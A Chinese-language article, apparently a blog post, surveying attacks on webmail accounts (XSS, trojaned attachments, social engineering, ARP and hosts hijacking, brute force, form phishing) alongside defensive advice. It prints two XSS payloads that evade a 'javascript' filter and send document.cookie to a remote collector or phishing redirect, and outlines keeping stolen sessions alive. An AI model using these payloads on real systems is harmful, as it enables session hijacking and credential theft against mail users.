这种攻击仍是目前最行之有效的方法，除了Gmail目前不存在XSS漏洞外，其它的Yahoo、Hotmail、网易、腾讯、搜狐、新浪等都存在XSS漏洞。XSS漏洞是啥？它的全称是Cross-site scripting，即跨站攻击，存在此漏洞的网站，能够被恶意攻击者劫持，它还派生了XSRF等等形式的利用，可谓Web木马。

08年，国内的邮箱都存在HTML标签跨站，漏洞都很弱智，比如<img src=javascript:alert()>插在邮件标题、邮件内容、邮件附件处即可弹出一个可爱的alert。接下来，进步一点了，还是以HTML标签为主，搞个数据包工具看哪个变量没过滤、以及编码转换。09年，又升级了，主要是国外的邮箱Gmail、Yahoo、Hotmail改以语法过滤，能利用的是CSS标签跨站，Gmail非常狠，除了早期存在Google Docs附件跨站攻击，基本把恶意代码过滤得惨不忍睹。Yahoo在09年亦漏洞不断，但很负责，隔三差五地不断升级，而Hotmail令人失望，居然1day过了一年都不补。

腾讯圈了一批牛人，忘记是Ph4nt0m还是80sec的，比其它的网易、搜狐、新浪的邮箱安全性好一点，搜狐与新浪最烂，透露一下，它们其中一个仍存在字符集的跨站漏洞。那么，XSS攻击到底是怎样的形式呢？用一个08年截获的新浪的HTML标签XSS漏洞说明，此漏洞是失效了，这年头基本没人直接公开0day，都养家糊口来着。

<INPUT TYPE="IMAGE" SRC="jav ascript:x7s=’var Then=new Date();Then.setTime(Then.getTime()+7200*1000);if(document.cookie. indexOf(\’Cookie1=\’) == -1){document.cookie=\’Cookie1=RAY;expires=\’+Then.toGMTString();window.parent.location.href=\’http://www.google.com/sina/index.php?url=\’+location.href+\’&c=\’+document.cookie.replace(/&/g,\’xxx\’);}’;eval(x7s)");">

此漏洞的形成在于新浪邮箱没有过滤空格，即过滤了javascript，但稍变形为jav ascript，便使得其后的恶意代码得以执行。这段代码有两个功能，获取Cookie并延长有效时间，并用父窗口windows.parent.location重定向至钓鱼网站。完整的攻击流程是，将上述XSS代码插入至邮件内容，以HTML模式发送邮件至受害者邮箱，受害者点开邮件时，会迅速转向sina钓鱼网站，而转向过程中，因采用parent，转向时，网址不会有变化，即不会显示钓鱼网址，而受害者在钓鱼网站输入密码提交之，钓鱼网站截取密码再转回真实的邮箱，由于控制了Cookie，受害者因怀疑会再次点开那封攻击邮件，但并不会再次跳转，这令受害者产生一种错觉，它以为邮箱仍是安全的。

你可以理解为窃取会话。你有过很多这样的经历，使用账户登陆某个网站，如Youku.com，关闭浏览器，再次打开youku.com，则不需要输入密码，这便是Cookie的作用。为什么会有Cookie呢？由于Http是无状态协议，为了在各个会话传递信息，因而需要Cookie或Session来标记访客者的状态，这里的Session是浏览器的Cookie里带了一个Token来标记，而服务器取得Token检查合性后便把服务器上存储的对应状态和浏览器绑定。总的意思就是：我只要窃取你的Cookie并保持了Session不过期，便可无须密码访问你的电子邮箱内容。

如果你要查看自己的Cookie，给Firefox装个HttpFox扩展即可，如下图。

窃取Cookie很简单，可将上面的Javascript稍加改装即可：<INPUT TYPE="IMAGE" SRC="jav ascript:document.location=’http://www.google.com/cookie/stealer.php?cookie=’+document.cookie;">，然后在stealer.php写个保存接收的Cookie记录的代码即可，如果你想让Session不过期，自己写个工具搞惦，每隔30秒请求一次目的页面。09年，Yahoo就被一帮人折腾了很多邮箱，不知道修复了没有，国内几个邮箱也能被利用。

即木马、病毒、后门、间谍、键盘记录器……这些软件，最常见算是doc、pdf病毒了，好好的一个文档，挟带了木马，双击一打开，你就完了。最容易受到攻击的是西藏人士、维权人士，然而，我不得不承认，这是一种非常阴险的手段，因为这毫无任何技术含量。这个攻击流程是，xxx部门获取经费收购或买断木马软件、捆绑软件，一般外包给中国公司，然后这些公司的报价奇高，各省xxx部门买了后，按照说明书配置木马上线，再用捆绑工具与可信的文件捆在一起，再用Google挑目标，比如找到abc.com网站，将该网站电子邮箱地址都整理出来，再用邮箱批量群发器不管三七十一把这些病毒通通发过去，再泡上一杯茶盯着木马软件等着目标上线。

这种没有采用鱼叉式攻击所导致的后果是，买的木马软件、捆绑软件很快就无效了，因为一顿乱发，被安全软件给盯上或用户举报查杀掉了，这个例证就是最近的IE 0day及PDF 0day很快曝光，估计这前后都不到一年。而在前文，尽管中国没有比美国更好的网络战争实力，但是不差钱，他们不需要关注技术细节，只需要知道谁有0day，谁会挖掘0day，然后招安，买断一堆的0day，比如Discuz!、Wordpress、Firefox漏洞，照着教程去攻击。

那么如何防御这种恶意附件的攻击？当你再次在邮箱看见一堆的PDF、DOC、HTM压缩包时，简单的方法是，下载后不要打开，直接上传至Google Docs，要是显示一片空白或无关的内容，不管三七二十一提交到VirusTotal网站上。

这个方法很简单，先跟你套近乎下，然后东问问西问问获得碎片信息，基本就是掘地三层把目标的信息全收集起来，完了后，评估一下你的弱点在哪里，再从弱点入手，这种攻击通常是雇佣了职业黑客来完成，因为过程比较复杂。举例子，攻击者有目标的邮箱，然后放到Google搜索，看目标注册了哪些网站，把这些网站整理，逐个把这些网站入侵了并下载数据库，从中找到目标的网站密码，再用网站密码试邮箱密码，要是目标只用一个密码，那么他的邮箱就完了。

总体上来说，你在网络上的信息越少，便能够降低被入侵的威胁。但事实并不情人愿，Web2.0的社交网络流行，你注册了Twitter，天天叽叽喳喳，一不小心把家世、住址、约会全都泄露了，你注册了豆瓣，天天左看右瞧还加了攻击者为好友，结果，他就知道你上网习惯与兴趣爱好，然后再用策略和你聊的特别欢，某一天，他跟你讲：我找到一个非常牛B的电影了，你在Verycd下载瞧瞧。你一看，还真不错，真是你喜欢的。然后他又讲，能不能帮我登陆下Gmail下载个文件看看是啥内容？我网速比较慢，我发你登陆密码。你听了，这小忙是得帮的，马上速度登陆对方的Gmail下载了压缩包，结果打开压缩包的文档发现啥都没，到了第二天，你就很神奇地发现，哦哦~我的豆瓣、twitter全都登陆不了……

社会工程学攻击永不过时，因为人人都有被利用的心理弱点，不管是好心、私心、同情心啥的，都无法避免这种攻击。不过，这项攻击最大的缺点是，很耗时间，短则几天，长则几月。这项攻击在敏感人士的社区很常见，如Forum、Google Groups等，那些攻击者最常见的手法盗用可信账户发送病毒附件。

以ARP攻击为例，A访问mail.sina.com，但攻击者B通过ARP劫持，可以使得你访问虚假的新浪钓鱼网站，而非真实的新浪。这种劫持通信的手法可适合不同的场合，如劫持ADSL线路，这需要红头文件请本地电信局协助的，然后修改你的数据包返回假的数据包，举例而言，你想从QQ官方下载QQ程序，攻击者修改数据包把QQ程序的下载地址改成木马地址，结果你就可以下载个木马回去了。如果你的通信是明文，没有采用SSL，攻击者可以直接看到你密码。不过，我不太肯定，Gmail虽然采用了SSL，但用户名与密码却在网址中出现，有公司宣称能解开SSL，我现在仍然是半信半疑。

另外一种是hosts文件劫持，典型的例子是，某个家伙在Twitter.com说：无法访问youtube.com？Picasaweb？很简单，修改hosts文件即可马上访问。你一听，哇，这么好，赶紧用记事本打开hosts文件，把对方提供的映射地址粘贴进去，再重新打开youtube.com，哇，真神奇，打开了~~聪明的看客接下来知道会发生啥了。

对于ADSL线路劫持的手法，这种攻击也是行之有效的。另外，我们也得对某些代理软件保持警惕，天知道那些免费的socks5、vpn会干出令人震惊的事吗？

有三种，web穷举、smtp穷举、云穷举。在多数的情况下，前两种效率低下，且限制诸多，以Web Gmail为例，它有CAPTCHA限制、重复次数的限制，不过，我倒是碰到过一个Python版的穷举工具，但速度很慢。至于smtp，如果服务器做了限制的话，比如现在网易对溯雪暴力破解工具是免疫的。云穷举，就我目前所知，我想这是最有效率的破解方法，已有安全专家Electric Alchemy利用亚马逊云服务Amazon Ec2运行Elcomsoft工具暴力破解PGP ZIP档案的例子。凭借云计算的超级计算机，以及一个分布式邮箱密码破解工具，暴力破解的速度将更快速。不过，这并不切实际，因为破解的成本太高了，需要很多米米。

暴力破解，这个古老的方法在目前只能针对极少的主流电子邮箱，尽管如此，但它对那些自架设的电子邮局仍然有效，因为它们没有CAPTCHA、重复尝试次数、服务器资源等限制。总的来说，暴力破解对本地的加密文件破解比较有效率，但对网络邮箱账户的破解尚不能达到30%的成功率。

这是社会工程学攻击的一种变形。当你打开某邮件，其内容部分嵌入了登陆表单，具体就是，你会看到一个要求你输入用户名、密码的登陆框。恰好RFA的新闻《维权人士邮箱和推特遭窃取、攻击》公布一张攻击实例图片，见下图。

如果你的Gmail收到上述的威胁恫吓邮件，不要担心，请在邮件的右侧点击下拉菜单，选择“这是网络欺诈”，而Gmail将会稍后封锁此攻击者。普通的用户不要误以为这是Gmail的安全漏洞，最简单的方法，选中邮件内容查看源代码，你可以发现并不存在恶意的Javascript脚本，而是HTML标签，你在源代码找到Action位置，将其后的钓鱼网站向Google举报即可。

其它的Gmail用户不需要担心，这种内嵌表单钓鱼方式是通杀Gmail、Hotmail、Yahoo、网易、腾讯、搜狐的邮箱，由于不存在恶意的Javascript，可称之良性HTML标签利用。看到这类威胁恫吓邮件，一是举报钓鱼邮件、钓鱼网址，二是删除该邮件，三是提醒你的朋友警惕。

如果你不想攻击者获取到你的IP地址、浏览器、操作系统等信息，你应该阻止邮件中图片显示。这是为什么？显示图片则意味着你访问了该图片的服务器，而该服务器则记录了你的访问数据。如果你已经安装了IIS、Apache，那么你可以打开http://localhost，再去查看它们的日志信息，看看到底有没有记录你的访问信息。

而如果你没有装上IIS、Apache无法测试的话，你可以打开间谍猪：http://www.spypig.com/ 向自己的邮箱发送测试邮件。如果你使用的Gmail，那非常好，Gmail默认是阻止图片显示的。